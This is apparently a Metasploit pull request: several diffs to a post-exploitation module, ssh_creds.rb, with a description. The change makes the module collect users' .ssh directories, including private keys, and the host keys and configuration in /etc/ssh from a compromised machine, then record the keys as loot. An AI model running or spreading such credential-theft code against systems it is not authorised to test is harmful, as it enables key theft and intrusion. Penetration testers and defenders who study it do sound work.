### PR TITLE
Update ssh_creds.rb

### DIFF
--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -23,8 +23,9 @@ class Metasploit3 < Msf::Post
 			'Name'           => 'Multi Gather OpenSSH PKI Credentials Collection',
 			'Description'    => %q{
 					This module will collect the contents of user's .ssh directory on the targeted
-				machine. Additionally, known_hosts and authorized_keys and any other files are also
-				downloaded. This module is largely based on firefox_creds.rb.
+				machine, including keys, known_hosts, authorized_keys and any other files contained
+				within. In addition it attempts to download the contents of /etc/ssh, which contains 
+				host keys and SSH configuration. This module is largely based on firefox_creds.rb.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         => ['Jim Halfpenny'],

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -39,6 +39,7 @@ class Metasploit3 < Msf::Post
 		paths = enum_user_directories.map {|d| d + "/.ssh"}
 
 		# Grab the contents of /etc/ssh as well. A host key is fine too.
+		print_status("Adding /etc/ssh to list of directories to loot")
 		paths.push('/etc/ssh')
 	
 		# Array#select! is only in 1.9
@@ -48,6 +49,10 @@ class Metasploit3 < Msf::Post
 			print_error("No users found with a .ssh directory")
 			return
 		end
+		
+		# Grab the contents of /etc/ssh as well. A host key is fine too.
+		print_status("Adding /etc/ssh to list of directories to loot")
+		paths.push('/etc/ssh')
 
 		download_loot(paths)
 	end

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -36,6 +36,10 @@ class Metasploit3 < Msf::Post
 	def run
 		print_status("Finding .ssh directories")
 		paths = enum_user_directories.map {|d| d + "/.ssh"}
+
+		# Grab the contents of /etc/ssh as well. A host key is fine too.
+		paths.push('/etc/ssh')
+	
 		# Array#select! is only in 1.9
 		paths = paths.select { |d| directory?(d) }
 

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -35,8 +35,17 @@ class Metasploit3 < Msf::Post
 	end
 
 	def run
-		print_status("Finding .ssh directories")
-		paths = enum_user_directories.map {|d| d + "/.ssh"}
+		if got_root?
+			print_status("Finding .ssh directories")
+			paths = enum_user_directories.map {|d| d + "/.ssh"}
+			
+			# Grab the contents of /etc/ssh as well. A host key is fine too.
+			print_status("Adding /etc/ssh to list of directories to loot")
+			paths.push('/etc/ssh')
+		else
+			print_status("Not root, checking user's home dir")
+			paths = ("#{home}/#{user}/.ssh")
+		end
 
 		# Array#select! is only in 1.9
 		paths = paths.select { |d| directory?(d) }
@@ -44,11 +53,7 @@ class Metasploit3 < Msf::Post
 		if paths.nil? or paths.empty?
 			print_error("No users found with a .ssh directory")
 		end
-
-		# Grab the contents of /etc/ssh as well. A host key is fine too.
-		print_status("Adding /etc/ssh to list of directories to loot")
-		paths.push('/etc/ssh')
-
+		
 		download_loot(paths)
 	end
 

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
 			'Description'    => %q{
 					This module will collect the contents of user's .ssh directory on the targeted
 				machine, including keys, known_hosts, authorized_keys and any other files contained
-				within. In addition it attempts to download the contents of /etc/ssh, which contains 
+				within. In addition it attempts to download the contents of /etc/ssh, which contains
 				host keys and SSH configuration. This module is largely based on firefox_creds.rb.
 			},
 			'License'        => MSF_LICENSE,
@@ -38,18 +38,13 @@ class Metasploit3 < Msf::Post
 		print_status("Finding .ssh directories")
 		paths = enum_user_directories.map {|d| d + "/.ssh"}
 
-		# Grab the contents of /etc/ssh as well. A host key is fine too.
-		print_status("Adding /etc/ssh to list of directories to loot")
-		paths.push('/etc/ssh')
-	
 		# Array#select! is only in 1.9
 		paths = paths.select { |d| directory?(d) }
 
 		if paths.nil? or paths.empty?
 			print_error("No users found with a .ssh directory")
-			return
 		end
-		
+
 		# Grab the contents of /etc/ssh as well. A host key is fine too.
 		print_status("Adding /etc/ssh to list of directories to loot")
 		paths.push('/etc/ssh')
@@ -89,7 +84,7 @@ class Metasploit3 < Msf::Post
 						:host => session.session_host,
 						:port => 22,
 						:sname => 'ssh',
-            :user => user,
+						:user => user,
 						:pass => loot_path,
 						:source_type => "exploit",
 						:type => 'ssh_key',


### PR DESCRIPTION
Add /etc/ssh to the list of directories to loot. Host keys and OpenSSH configuration can be useful. Updated the module description and status messages. Moved the addition of /etc/ssh to the directory list until after the test for users .ssh directories.
